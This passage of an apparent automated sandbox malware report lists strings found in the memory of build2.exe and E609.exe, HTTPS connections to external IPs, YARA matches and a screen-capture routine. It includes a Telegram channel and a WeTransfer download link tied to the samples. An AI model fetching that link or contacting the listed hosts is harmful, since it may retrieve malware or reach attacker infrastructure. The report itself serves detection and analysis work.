            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
            Source: build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
            Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
            Source: build2.exe, 00000013.00000003.2330175693.00000000008EF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2319193965.00000000008E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: build2.exe, 00000013.00000003.2330175693.00000000008EF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2319193965.00000000008E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: build2.exe, 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/copterwin
            Source: E609.exe, 0000000F.00000002.2883282984.000000000310E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wetransfer.com/downloads
            Source: E609.exe, 0000000F.00000002.2883282984.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000892000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000001.00000000.1692249717.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
            Source: explorer.exe, 00000001.00000000.1692249717.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2706345491.000000000900D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
            Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
            Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/ost.exe
            Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
            Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/1
            Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/86-6cb1-4744-a649-0782dee5c50c
            Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
            Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
            Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
            Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
            Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
            Source: explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/fingerprints-on-ransom-n
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
            Source: explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/do-parallel-universes-exist/ss-AA17h065
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
            Source: explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 103.174.152.66:443 -> 192.168.2.4:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.4:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.4:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49772 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.4:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49785 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.4:49803 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49812 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: Yara matchFile source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,10_2_004822E0

            Spam, unwanted Advertisements and Ransom Demands

            barindex
